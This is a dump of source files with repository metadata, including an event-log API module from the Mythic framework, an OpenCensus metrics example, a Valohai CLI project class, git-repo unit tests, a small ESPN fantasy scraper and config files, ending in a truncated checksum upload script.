| hexsha (string, len 40) | size (int64, 4-1.02M) | ext (string, 8 classes) | lang (string, 1 class) | max_stars_repo_path (string, len 4-209) | max_stars_repo_name (string, len 5-121) | max_stars_repo_head_hexsha (string, len 40) | max_stars_repo_licenses (list, len 1-10) | max_stars_count (int64, 1-191k, nullable) | max_stars_repo_stars_event_min_datetime (string, len 24, nullable) | max_stars_repo_stars_event_max_datetime (string, len 24, nullable) | max_issues_repo_path (string, len 4-209) | max_issues_repo_name (string, len 5-121) | max_issues_repo_head_hexsha (string, len 40) | max_issues_repo_licenses (list, len 1-10) | max_issues_count (int64, 1-67k, nullable) | max_issues_repo_issues_event_min_datetime (string, len 24, nullable) | max_issues_repo_issues_event_max_datetime (string, len 24, nullable) | max_forks_repo_path (string, len 4-209) | max_forks_repo_name (string, len 5-121) | max_forks_repo_head_hexsha (string, len 40) | max_forks_repo_licenses (list, len 1-10) | max_forks_count (int64, 1-105k, nullable) | max_forks_repo_forks_event_min_datetime (string, len 24, nullable) | max_forks_repo_forks_event_max_datetime (string, len 24, nullable) | content (string, len 4-1.02M) | avg_line_length (float64, 1.07-66.1k) | max_line_length (int64, 4-266k) | alphanum_fraction (float64, 0.01-1) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
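The header above is the per-file schema of this dump: repository metadata (path, repo name, head commit, licenses), star/issue/fork counts with their event timestamps, and the raw file content plus a few size and character statistics. As a hedged illustration only, the sketch below shows how rows with this schema could be streamed and filtered with the Hugging Face datasets library; the dataset name, data_dir, and the star threshold are placeholders, not values taken from this dump.

# Hedged sketch: stream rows with the schema above and keep popular Python files.
# "bigcode/the-stack" and data_dir="data/python" are assumptions/placeholders.
from datasets import load_dataset

rows = load_dataset("bigcode/the-stack", data_dir="data/python",
                    split="train", streaming=True)
for row in rows:
    stars = row["max_stars_count"] or 0          # nullable column
    if row["ext"] == "py" and stars >= 100:
        print(row["max_stars_repo_name"], row["max_stars_repo_path"],
              row["size"], round(row["alphanum_fraction"], 2))
        break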
3b2a99b7dc2c09c8596c0f28ca4318b474d9d158 | 11,696 | py | Python | mythic-docker/app/api/event_message_api.py | xorrior/Mythic | ea348b66e1d96e88e0e7fbabff182945cbdf12b6 | ["BSD-3-Clause"] | 2 | 2021-01-28T19:35:46.000Z | 2021-04-08T12:01:48.000Z | mythic-docker/app/api/event_message_api.py | xorrior/Mythic | ea348b66e1d96e88e0e7fbabff182945cbdf12b6 | ["BSD-3-Clause"] | null | null | null | mythic-docker/app/api/event_message_api.py | xorrior/Mythic | ea348b66e1d96e88e0e7fbabff182945cbdf12b6 | ["BSD-3-Clause"] | 2 | 2021-06-23T18:59:18.000Z | 2021-08-20T00:06:49.000Z |
from app import mythic, db_objects
from sanic.response import json
from sanic_jwt.decorators import scoped, inject_user
import app.database_models.model as db_model
from sanic.exceptions import abort
from math import ceil
from peewee import fn
from app.api.siem_logger import log_to_siem
async def get_old_event_alerts(user):
try:
# query = await db_model.operator_query()
# operator = await db_objects.get(query, username=user['username'])
query = await db_model.operation_query()
operation = await db_objects.get(query, name=user["current_operation"])
event_query = await db_model.operationeventlog_query()
alerts = await db_objects.execute(
event_query.where(
(db_model.OperationEventLog.operation == operation)
& (db_model.OperationEventLog.deleted == False)
& (db_model.OperationEventLog.level != "info")
& (db_model.OperationEventLog.resolved == False)
)
)
total_alerts = []
for a in alerts:
total_alerts.append({"id": a.id})
return {"status": "success", "alerts": total_alerts}
except Exception as e:
return {"status": "error", "error": str(e)}
@mythic.route(mythic.config["API_BASE"] + "/event_message", methods=["GET"])
@inject_user()
@scoped(["auth:user", "auth:apitoken_user"], False)
async def get_event_message(request, user):
if user["auth"] not in ["access_token", "apitoken"]:
abort(
status_code=403,
message="Cannot access via Cookies. Use CLI or access via JS in browser",
)
try:
query = await db_model.operation_query()
operation = await db_objects.get(query, name=user["current_operation"])
event_query = await db_model.operationeventlog_query()
alerts = await db_objects.execute(
event_query.where(
(db_model.OperationEventLog.operation == operation)
& (db_model.OperationEventLog.deleted == False)
)
)
total_alerts = []
for a in alerts:
total_alerts.append(a.to_json())
return json({"status": "success", "alerts": total_alerts})
except Exception as e:
print(str(e))
return json({"status": "error", "error": str(e)})
@mythic.route(mythic.config["API_BASE"] + "/event_message", methods=["POST"])
@inject_user()
@scoped(["auth:user", "auth:apitoken_user"], False)
async def add_event_message(request, user):
if user["auth"] not in ["access_token", "apitoken"]:
abort(
status_code=403,
message="Cannot access via Cookies. Use CLI or access via JS in browser",
)
if user["view_mode"] == "spectator":
return json({"status": "error", "error": "Spectators cannot send messages"})
try:
query = await db_model.operator_query()
operator = await db_objects.get(query, username=user["username"])
query = await db_model.operation_query()
operation = await db_objects.get(query, name=user["current_operation"])
data = request.json
if "message" not in data:
return json({"status": "error", "error": "message is required"})
if "level" not in data:
data["level"] = "info"
if data["level"] not in ["info", "warning"]:
return json({"status": "error", "error": "level not recognized"})
msg = await db_objects.create(
db_model.OperationEventLog,
operator=operator,
operation=operation,
message=data["message"].encode('unicode-escape'),
level=data["level"],
)
await log_to_siem(msg.to_json(), mythic_object="eventlog_new")
return json({"status": "success", **msg.to_json()})
except Exception as e:
return json({"status": "error", "error": str(e)})
@mythic.route(mythic.config["API_BASE"] + "/event_message/<eid:int>", methods=["PUT"])
@inject_user()
@scoped(["auth:user", "auth:apitoken_user"], False)
async def edit_event_message(request, user, eid):
if user["auth"] not in ["access_token", "apitoken"]:
abort(
status_code=403,
message="Cannot access via Cookies. Use CLI or access via JS in browser",
)
if user["view_mode"] == "spectator":
return json({"status": "error", "error": "Spectators cannot edit messages"})
try:
query = await db_model.operator_query()
operator = await db_objects.get(query, username=user["username"])
query = await db_model.operation_query()
operation = await db_objects.get(query, name=user["current_operation"])
data = request.json
query = await db_model.operationeventlog_query()
msg = await db_objects.get(query, id=eid, operation=operation)
if "message" not in data and "resolved" not in data:
return json(
{"status": "error", "error": "message or resolve status is required"}
)
else:
if (
user["admin"]
or msg.operator == operator
or operation.name in user["admin_operations"]
):
if "resolved" in data:
msg.resolved = data["resolved"]
if "message" in data:
msg.message = data["message"].encode('unicode-escape')
if "level" in data and data["level"] in ["info", "warning"]:
msg.level = data["level"]
await log_to_siem(msg.to_json(), mythic_object="eventlog_modified")
await db_objects.update(msg)
else:
if "resolved" in data and data["resolved"] != msg.resolved:
msg.resolved = data["resolved"]
await db_objects.update(msg)
await log_to_siem(msg.to_json(), mythic_object="eventlog_modified")
else:
return json(
{
"status": "error",
"error": "You must be the author of the message, a global admin, or operation admin to edit that message",
}
)
return json({"status": "success", **msg.to_json()})
except Exception as e:
return json({"status": "error", "error": str(e)})
@mythic.route(mythic.config["API_BASE"] + "/event_message/delete", methods=["POST"])
@inject_user()
@scoped(["auth:user", "auth:apitoken_user"], False)
async def remove_event_message(request, user):
if user["auth"] not in ["access_token", "apitoken"]:
abort(
status_code=403,
message="Cannot access via Cookies. Use CLI or access via JS in browser",
)
if user["view_mode"] == "spectator":
return json({"status": "error", "error": "Spectators cannot remove messages"})
try:
query = await db_model.operator_query()
operator = await db_objects.get(query, username=user["username"])
query = await db_model.operation_query()
operation = await db_objects.get(query, name=user["current_operation"])
data = request.json
query = await db_model.operationeventlog_query()
not_authorized = False
for e in data["messages"]:
# given an array of message ids to delete, try to delete them all
msg = await db_objects.get(query, id=e, operation=operation)
if (
user["admin"]
or msg.operator == operator
or operation.name in user["admin_operations"]
):
msg.deleted = True
await log_to_siem(msg.to_json(), mythic_object="eventlog_modified")
await db_objects.update(msg)
else:
not_authorized = True
if not_authorized:
return json(
{
"status": "error",
"error": "Failed to delete some messages since you're not authorized",
}
)
else:
return json({"status": "success"})
except Exception as e:
return json({"status": "error", "error": str(e)})
@mythic.route(mythic.config["API_BASE"] + "/event_message/search", methods=["POST"])
@inject_user()
@scoped(
["auth:user", "auth:apitoken_user"], False
) # user or user-level api token are ok
async def search_event_message(request, user):
if user["auth"] not in ["access_token", "apitoken"]:
abort(
status_code=403,
message="Cannot access via Cookies. Use CLI or access via JS in browser",
)
try:
query = await db_model.operation_query()
operation = await db_objects.get(query, name=user["current_operation"])
query = await db_model.operationeventlog_query()
except Exception as e:
return json(
{
"status": "error",
"error": "failed to find that file browsing object in your current operation",
}
)
try:
data = request.json
count = await db_objects.count(
query.where(
(db_model.OperationEventLog.operation == operation)
& (
fn.encode(db_model.OperationEventLog.message, "escape").regexp(
data["search"]
)
)
).distinct()
)
if "page" not in data:
# allow a blanket search to still be performed
responses = await db_objects.execute(
query.where(
(db_model.OperationEventLog.operation == operation)
& (
fn.encode(db_model.OperationEventLog.message, "escape").regexp(
data["search"]
)
)
).distinct()
)
data["page"] = 1
data["size"] = count
else:
if (
"page" not in data
or "size" not in data
or int(data["size"]) <= 0
or int(data["page"]) <= 0
):
return json(
{
"status": "error",
"error": "size and page must be supplied and be greater than 0",
}
)
data["size"] = int(data["size"])
data["page"] = int(data["page"])
if data["page"] * data["size"] > count:
data["page"] = ceil(count / data["size"])
if data["page"] == 0:
data["page"] = 1
responses = await db_objects.execute(
query.where(
(db_model.OperationEventLog.operation == operation)
& (
fn.encode(db_model.OperationEventLog.message, "escape").regexp(
data["search"]
)
)
)
.distinct()
.paginate(data["page"], data["size"])
)
output = []
for r in responses:
rjson = r.to_json()
output.append(rjson)
return json(
{
"status": "success",
"output": output,
"total_count": count,
"page": data["page"],
"size": data["size"],
}
)
except Exception as e:
print(e)
return json({"status": "error", "error": str(e)})
| 39.918089 | 134 | 0.542322 |
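As a rough illustration of the event_message API implemented in the file above, the sketch below posts a new event log entry. The host, API prefix, and token are placeholders (the real prefix comes from mythic.config["API_BASE"]); only the payload keys, "message" (required) and "level" ("info" or "warning"), are taken from the handler's validation logic.

import requests

MYTHIC_HOST = "https://mythic.example.com"  # placeholder
API_BASE = "/api/v1.4"                      # placeholder for mythic.config["API_BASE"]
API_TOKEN = "<api token>"                   # assumption: a user-level API token

resp = requests.post(
    f"{MYTHIC_HOST}{API_BASE}/event_message",
    headers={"Authorization": f"Bearer {API_TOKEN}"},
    json={"message": "operator note", "level": "info"},
    verify=False,  # assumption: self-signed certificate on the Mythic server
)
print(resp.status_code, resp.json())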
355c729544b9a56d9817c179a4b4657efd8ca8a1 | 2,266 | py | Python | contrib/opencensus-ext-azure/examples/metrics/sum.py | Flared/opencensus-python | e2535e688a50c7a06be8af93ca3b987d387da605 | ["Apache-2.0"] | 650 | 2017-07-09T02:08:10.000Z | 2022-03-22T20:39:54.000Z | contrib/opencensus-ext-azure/examples/metrics/sum.py | Flared/opencensus-python | e2535e688a50c7a06be8af93ca3b987d387da605 | ["Apache-2.0"] | 735 | 2017-07-26T01:15:16.000Z | 2022-03-29T20:17:20.000Z | contrib/opencensus-ext-azure/examples/metrics/sum.py | Flared/opencensus-python | e2535e688a50c7a06be8af93ca3b987d387da605 | ["Apache-2.0"] | 256 | 2017-07-24T18:29:15.000Z | 2022-03-15T15:33:03.000Z |
# Copyright 2019, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
from opencensus.ext.azure import metrics_exporter
from opencensus.stats import aggregation as aggregation_module
from opencensus.stats import measure as measure_module
from opencensus.stats import stats as stats_module
from opencensus.stats import view as view_module
from opencensus.tags import tag_map as tag_map_module
stats = stats_module.stats
view_manager = stats.view_manager
stats_recorder = stats.stats_recorder
REQUEST_MEASURE = measure_module.MeasureFloat("Requests",
"number of requests",
"requests")
NUM_REQUESTS_VIEW = view_module.View("Number of Requests",
"number of requests",
["url"],
REQUEST_MEASURE,
aggregation_module.SumAggregation())
def main():
# Enable metrics
# Set the interval in seconds in which you want to send metrics
# TODO: you need to specify the instrumentation key in a connection string
# and place it in the APPLICATIONINSIGHTS_CONNECTION_STRING
# environment variable.
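    # For example (placeholder value, not from this file), set it before running:
    #   APPLICATIONINSIGHTS_CONNECTION_STRING="InstrumentationKey=<your-ikey>"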
exporter = metrics_exporter.new_metrics_exporter()
view_manager.register_exporter(exporter)
view_manager.register_view(NUM_REQUESTS_VIEW)
mmap = stats_recorder.new_measurement_map()
tmap = tag_map_module.TagMap()
tmap.insert("url", "http://example.com")
for i in range(100):
print(i)
mmap.measure_int_put(REQUEST_MEASURE, i)
mmap.record(tmap)
time.sleep(1)
print("Done recording metrics")
if __name__ == "__main__":
main()
| 35.968254 | 78 | 0.682259 |
7148797b4fa13c65c6b747f8df9f828115e90104 | 5,261 | py | Python | valohai_cli/models/project.py | valohai/valohai-cli | d45f4d8d3b39e803730c070a40f8d2ddfbfb661c | ["MIT"] | 11 | 2017-11-06T16:31:46.000Z | 2020-10-26T09:55:12.000Z | valohai_cli/models/project.py | valohai/valohai-cli | d45f4d8d3b39e803730c070a40f8d2ddfbfb661c | ["MIT"] | 147 | 2017-04-06T09:46:11.000Z | 2022-03-10T16:24:15.000Z | valohai_cli/models/project.py | valohai/valohai-cli | d45f4d8d3b39e803730c070a40f8d2ddfbfb661c | ["MIT"] | 4 | 2017-04-16T16:00:51.000Z | 2021-07-05T11:36:36.000Z |
import io
import os
from typing import List, Optional, TextIO, Union
import valohai_yaml
from click import BadParameter
from valohai_yaml.objs.config import Config
from valohai_cli.api import request
from valohai_cli.exceptions import APIError, InvalidConfig, NoExecution
from valohai_cli.git import get_file_at_commit
class Project:
is_remote = False
def __init__(self, data: dict, directory: str) -> None:
self.data = data
if not os.path.isdir(directory):
raise ValueError(f"Invalid directory: {directory}")
self.directory = directory
self._commit_list: Optional[List[dict]] = None
@property
def id(self) -> str:
return str(self.data['id'])
@property
def name(self) -> str:
return str(self.data['name'])
def get_config(self, commit_identifier: Optional[str] = None) -> Config:
"""
Get the `valohai_yaml.Config` object from the current working directory,
or a given commit.
:param commit_identifier: Hexadecimal commit identifier; optional.
:return: valohai_yaml.Config
"""
if not commit_identifier: # Current working directory
filename = self.get_config_filename()
with open(filename) as infp:
return self._parse_config(infp, filename)
else: # Arbitrary commit
filename = f'{commit_identifier}:valohai.yaml'
directory = self.directory
config_bytes = get_file_at_commit(directory, commit_identifier, 'valohai.yaml')
config_sio = io.StringIO(config_bytes.decode('utf-8'))
return self._parse_config(config_sio, filename)
def _parse_config(self, config_fp: TextIO, filename: str = '<config file>') -> Config:
try:
return valohai_yaml.parse(config_fp)
except OSError as err:
raise InvalidConfig(f'Could not read {filename}') from err
except valohai_yaml.ValidationErrors as ves:
raise InvalidConfig('{filename} is invalid ({n} errors); see `vh lint`'.format(
filename=filename,
n=len(ves.errors),
))
def get_config_filename(self) -> str:
return os.path.join(self.directory, 'valohai.yaml')
def get_execution_from_counter(
self,
counter: Union[int, str],
params: Optional[dict] = None,
) -> dict:
if isinstance(counter, str):
counter = counter.lstrip('#')
if not (counter.isdigit() or counter == 'latest'):
raise BadParameter(
f'{counter} is not a valid counter value; it must be an integer or "latest"',
)
try:
data = request(
method='get',
url=f'/api/v0/executions/{self.id}:{counter}/',
params=(params or {}),
).json()
assert isinstance(data, dict)
return data
except APIError as ae:
if ae.response.status_code == 404:
raise NoExecution(f'Execution #{counter} does not exist')
raise
def load_commit_list(self) -> List[dict]:
"""
Get a list of non-adhoc commits, newest first.
"""
if self._commit_list is None:
commits: List[dict] = list(request(
method='get',
url='/api/v0/commits/',
params={
'project': self.id,
'adhoc': 'false',
'limit': 9000,
},
).json()['results'])
commits.sort(key=lambda c: str(c['commit_time']), reverse=True)
self._commit_list = commits
return self._commit_list
def resolve_commit(self, commit_identifier: Optional[str] = None) -> dict:
"""
Resolve a commit identifier to a commit dict.
:raises KeyError: if an explicitly named identifier is not found
:raises IndexError: if there are no commits
"""
commits = self.load_commit_list()
if commit_identifier:
by_identifier = {c['identifier']: c for c in commits}
return by_identifier[commit_identifier]
newest_commit = sorted(
(c for c in commits if not c.get('adhoc')),
key=lambda c: str(c['commit_time']),
reverse=True,
)[0]
assert newest_commit['identifier']
return newest_commit
def load_full_commit(self, identifier: Optional[str] = None) -> dict:
"""
Load the commit object including config data (as a dict) from the Valohai host for the given commit identifier.
:param identifier: Identifier; None to use the latest commit on the server.
"""
for commit in self.load_commit_list():
if commit.get('adhoc'):
continue
if not identifier or commit['identifier'] == identifier:
data = request(method='get', url=commit['url'], params={'include': 'config'}).json()
assert isinstance(data, dict)
return data
raise ValueError(f'No commit found for commit {identifier}')
def __str__(self) -> str:
return self.name
| 36.534722 | 119 | 0.588101 |
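A hedged usage sketch for the Project class above (not part of the file): the import path mirrors valohai_cli/models/project.py, the data dict fields are the ones the class actually reads (id, name), and the values are invented. get_config assumes a valohai.yaml exists in the given directory.

from valohai_cli.models.project import Project

proj = Project(data={"id": "0123", "name": "example"}, directory=".")
print(proj.id, proj.name)
print(proj.get_config_filename())   # <directory>/valohai.yaml
config = proj.get_config()          # parses the working-copy valohai.yaml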
8d9b5f00362d8e0186852c8c1afba18e8792d44c | 2,694 | py | Python | tests/test_git_command.py | Orchild/git-repo | a46bf7dc2af111ae4a663d61ed06dc90ddfb8068 | ["Apache-2.0"] | null | null | null | tests/test_git_command.py | Orchild/git-repo | a46bf7dc2af111ae4a663d61ed06dc90ddfb8068 | ["Apache-2.0"] | null | null | null | tests/test_git_command.py | Orchild/git-repo | a46bf7dc2af111ae4a663d61ed06dc90ddfb8068 | ["Apache-2.0"] | 2 | 2019-08-12T22:30:01.000Z | 2019-10-27T10:06:06.000Z |
# -*- coding:utf-8 -*-
#
# Copyright 2019 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unittests for the git_command.py module."""
from __future__ import print_function
import re
import unittest
import git_command
class GitCallUnitTest(unittest.TestCase):
"""Tests the _GitCall class (via git_command.git)."""
def test_version_tuple(self):
"""Check git.version_tuple() handling."""
ver = git_command.git.version_tuple()
self.assertIsNotNone(ver)
# We don't dive too deep into the values here to avoid having to update
# whenever git versions change. We do check relative to this min version
# as this is what `repo` itself requires via MIN_GIT_VERSION.
MIN_GIT_VERSION = (2, 10, 2)
self.assertTrue(isinstance(ver.major, int))
self.assertTrue(isinstance(ver.minor, int))
self.assertTrue(isinstance(ver.micro, int))
self.assertGreater(ver.major, MIN_GIT_VERSION[0] - 1)
self.assertGreaterEqual(ver.micro, 0)
self.assertGreaterEqual(ver.major, 0)
self.assertGreaterEqual(ver, MIN_GIT_VERSION)
self.assertLess(ver, (9999, 9999, 9999))
self.assertNotEqual('', ver.full)
class UserAgentUnitTest(unittest.TestCase):
"""Tests the UserAgent function."""
def test_smoke_os(self):
"""Make sure UA OS setting returns something useful."""
os_name = git_command.user_agent.os
# We can't dive too deep because of OS/tool differences, but we can check
# the general form.
m = re.match(r'^[^ ]+$', os_name)
self.assertIsNotNone(m)
def test_smoke_repo(self):
"""Make sure repo UA returns something useful."""
ua = git_command.user_agent.repo
# We can't dive too deep because of OS/tool differences, but we can check
# the general form.
m = re.match(r'^git-repo/[^ ]+ ([^ ]+) git/[^ ]+ Python/[0-9.]+', ua)
self.assertIsNotNone(m)
def test_smoke_git(self):
"""Make sure git UA returns something useful."""
ua = git_command.user_agent.git
# We can't dive too deep because of OS/tool differences, but we can check
# the general form.
m = re.match(r'^git/[^ ]+ ([^ ]+) git-repo/[^ ]+', ua)
self.assertIsNotNone(m)
| 34.101266 | 77 | 0.702673 |
0985cf75af6e813b5d41f1b47bdc93ca1762a436 | 1,782 | py | Python | tests/test_html.py | BigSmitty72/FFballPython | 8dd15d2753ce9df59b6e4393629eb065f8e5e304 | ["BSD-3-Clause"] | null | null | null | tests/test_html.py | BigSmitty72/FFballPython | 8dd15d2753ce9df59b6e4393629eb065f8e5e304 | ["BSD-3-Clause"] | null | null | null | tests/test_html.py | BigSmitty72/FFballPython | 8dd15d2753ce9df59b6e4393629eb065f8e5e304 | ["BSD-3-Clause"] | null | null | null |
import mechanize
from bs4 import BeautifulSoup, SoupStrainer
import re
league = "70928"
season = "2016"
def standings_html():
url = UrlConstants.STANDINGS_URL.format(league, season)
return get_html(url)
def standings_detail_html():
url = UrlConstants.STANDINGS_URL.format(league, season)
return get_html(url)
def roster_html(team):
url = UrlConstants.ROSTER_URL.format(league, team, season)
return get_html(url)
def free_agent_html(team):
    url = UrlConstants.FA_URL.format(league, team)
    return get_html(url)
def transaction_html():
    url = UrlConstants.TRANSACTIONS_URL.format(league)
    return get_html(url)
def settings_html():
    url = UrlConstants.SETTINGS_URL.format(league)
    return get_html(url)
def get_html(url):
browser = mechanize.Browser()
browser.open(url)
return browser.response().read()
class UrlConstants:
STANDINGS_URL = 'http://games.espn.go.com/ffl/standings?leagueId={0}&seasonId={1}'
SCOREBOARD_URL = 'http://games.espn.go.com/ffl/scoreboard?leagueId={0}&seasonId={1}'
ROSTER_URL = 'http://games.espn.go.com/ffl/clubhouse?leagueId={0}&teamId={1}&seasonId={2}'
FA_URL = 'http://games.espn.go.com/ffl/freeagency?leagueId={0}&teamId={1}'
    SCORING_URL = 'http://games.espn.go.com/ffl/leaders?leagueId={0}&teamId={1}&scoringPeriodId={2}'
WAIVER_URL = 'http://games.espn.go.com/ffl/tools/waiverorder?leagueId={0}'
TRANSACTIONS_URL = 'http://games.espn.go.com/ffl/tools/transactioncounter?leagueId={0}'
SETTINGS_URL = 'http://games.espn.go.com/ffl/leaguesetup/settings?leagueId={0}'
only_tags_with_id_link2 = SoupStrainer(id=re.compile("playertable_"))
| 29.213115 | 100 | 0.723906 |
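A hypothetical usage sketch for the helpers above (none of this appears in the original file): fetch the standings page for the hard-coded league and season, then pull the ESPN player tables out by their id prefix.

html = standings_html()
soup = BeautifulSoup(html, "html.parser")
for table in soup.find_all(id=re.compile("playertable_")):
    print(table.get("id"))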
511a33391498ae1937a069c4b5afa80b4a34bf9e | 3,012 | py | Python | models/SCC_Model/CSRNet.py | Yuuchuin/C3_V2 | 92a5edbc2c2b3452c5f57e74f928591192293e81 | ["MIT"] | 1 | 2021-01-29T09:43:05.000Z | 2021-01-29T09:43:05.000Z | models/SCC_Model/CSRNet.py | Yuuchuin/C3_V2 | 92a5edbc2c2b3452c5f57e74f928591192293e81 | ["MIT"] | null | null | null | models/SCC_Model/CSRNet.py | Yuuchuin/C3_V2 | 92a5edbc2c2b3452c5f57e74f928591192293e81 | ["MIT"] | null | null | null |
import torch.nn as nn
import torch
from torchvision import models
import torch.nn.functional as F
from .SCC_BaseModel import SCC_BaseModel
from torch import optim
from torch.optim.lr_scheduler import StepLR
class csrnet(nn.Module):
def __init__(self, load_weights=False):
super(csrnet, self).__init__()
self.seen = 0
self.frontend_feat = [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512]
self.backend_feat = [512, 512, 512,256,128,64]
self.frontend = make_layers(self.frontend_feat)
self.backend = make_layers(self.backend_feat,in_channels = 512,dilation = True)
self.output_layer = nn.Conv2d(64, 1, kernel_size=1)
if not load_weights:
mod = models.vgg16(pretrained = True)
self._initialize_weights()
self.frontend.load_state_dict(mod.features[0:23].state_dict())
def forward(self,x):
shape = x.shape[-2:]
x = self.frontend(x)
x = self.backend(x)
x = self.output_layer(x)
x = F.interpolate(x, shape)
return x
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.normal_(m.weight, std=0.01)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def make_layers(cfg, in_channels = 3,batch_norm=False,dilation = False):
if dilation:
d_rate = 2
else:
d_rate = 1
layers = []
for v in cfg:
if v == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
else:
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=d_rate,dilation = d_rate)
if batch_norm:
layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
else:
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = v
return nn.Sequential(*layers)
class CSRNet(SCC_BaseModel):
def __init__(self, dataloader, cfg, dataset_cfg, pwd):
super(CSRNet, self).__init__(dataloader, cfg, dataset_cfg, pwd)
self.net = csrnet()
self.optimizer = optim.Adam(self.net.parameters(), lr=cfg.LR, weight_decay=1e-4)
# self.optimizer = optim.SGD(self.net.parameters(), cfg.LR, momentum=0.95,weight_decay=5e-4)
self.scheduler = StepLR(self.optimizer, step_size=cfg.NUM_EPOCH_LR_DECAY, gamma=cfg.LR_DECAY)
if len(self.gpus) == 1:
self.net = self.net.cuda()
elif len(self.gpus) > 1:
self.net = torch.nn.DataParallel(self.net, device_ids=self.gpus).cuda()
if len(self.gpus) >= 1:
self.loss_mse_fn = nn.MSELoss().cuda()
if __name__ == '__main__':
dummy = torch.randn([2,3,512,512]).cuda()
model = csrnet().cuda()
pre = model(dummy)
print(pre.shape)
| 35.857143 | 101 | 0.597278 |
1f578b742ccd924cc07a04a34fc4894fa54d766b | 399 | py | Python | Constants.py | r-soltani/BreachAnalyzer | 15c1cde1e068e4f1e0d77393e82a5034bb3d045b | ["Apache-2.0"] | null | null | null | Constants.py | r-soltani/BreachAnalyzer | 15c1cde1e068e4f1e0d77393e82a5034bb3d045b | ["Apache-2.0"] | null | null | null | Constants.py | r-soltani/BreachAnalyzer | 15c1cde1e068e4f1e0d77393e82a5034bb3d045b | ["Apache-2.0"] | null | null | null |
# data retrieval parameters
# number of days prior to the incident date
STOCK_PRICE_TARGET_DAYS_DELTA_BEFORE = 7
# number of days after the incident date
STOCK_PRICE_TARGET_DAYS_DELTA_AFTER = 14
STOCK_PRICE_TARGET_DAYS_DELTA_INTERVAL = 1
# price change reference (NASDAQ)
NASDAQ_TICKER = "NDAQ"
# AlphaAdvantage API Key
ALPHA_ADVANTAGE_API_KEY = "KEY GOES HERE"
VERBOSE = False
# Graph parameters
| 19.95 | 42 | 0.807018 |
72840d2036585d7b83b2266ffabf1bb5ba349211 | 1,693 | py | Python | built-in/TensorFlow/Official/cv/image_classification/ResnetVariant_for_TensorFlow/automl/evaluate_service/config.py | Ascend/modelzoo | f018cfed33dbb1cc2110b9ea2e233333f71cc509 | ["Apache-2.0"] | 12 | 2020-12-13T08:34:24.000Z | 2022-03-20T15:17:17.000Z | built-in/TensorFlow/Official/cv/image_classification/ResnetVariant_for_TensorFlow/automl/evaluate_service/config.py | Ascend/modelzoo | f018cfed33dbb1cc2110b9ea2e233333f71cc509 | ["Apache-2.0"] | 1 | 2022-01-20T03:11:05.000Z | 2022-01-20T06:53:39.000Z | built-in/TensorFlow/Official/cv/image_classification/ResnetVariant_for_TensorFlow/automl/evaluate_service/config.py | Ascend/modelzoo | f018cfed33dbb1cc2110b9ea2e233333f71cc509 | ["Apache-2.0"] | 2 | 2021-07-10T12:40:46.000Z | 2021-12-17T07:55:15.000Z |
# coding=utf-8
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""The config of the evaluate service."""
davinci_environment_type = "ATLAS200DK" # Evb , ATLAS200DK or Atlas300
ddk_host_ip = "192.168.0.1"
listen_port = 8888
# if your environment_type is ATLAS200DK, the following parameters should be configured; if not, just ignore them
ddk_user_name = "ly"
atlas_host_ip = "192.168.0.2"
| 43.410256 | 109 | 0.692853 |
34a58fce5e908f69fe01dc9307aab161407d7cb3 | 1,694 | py | Python | script/upload-checksums.py | rprichard/atom-shell | 73ee24bd98ff40a0bbde1fe1bbbf74ff9a91a5d5 | ["MIT"] | 2 | 2020-01-05T10:34:24.000Z | 2020-01-05T10:40:00.000Z | script/upload-checksums.py | rprichard/atom-shell | 73ee24bd98ff40a0bbde1fe1bbbf74ff9a91a5d5 | ["MIT"] | null | null | null | script/upload-checksums.py | rprichard/atom-shell | 73ee24bd98ff40a0bbde1fe1bbbf74ff9a91a5d5 | ["MIT"] | 3 | 2015-04-19T04:09:08.000Z | 2021-09-19T19:02:32.000Z |
#!/usr/bin/env python
import argparse
import hashlib
import os
import tempfile
from lib.util import download, rm_rf, s3_config, s3put
DIST_URL = 'https://gh-contractor-zcbenz.s3.amazonaws.com/atom-shell/dist/'
def main():
args = parse_args()
url = DIST_URL + args.version + '/'
directory, files = download_files(url, get_files_list(args.version))
checksums = [
create_checksum('sha1', directory, 'SHASUMS.txt', files),
create_checksum('sha256', directory, 'SHASUMS256.txt', files)
]
bucket, access_key, secret_key = s3_config()
s3put(bucket, access_key, secret_key, directory,
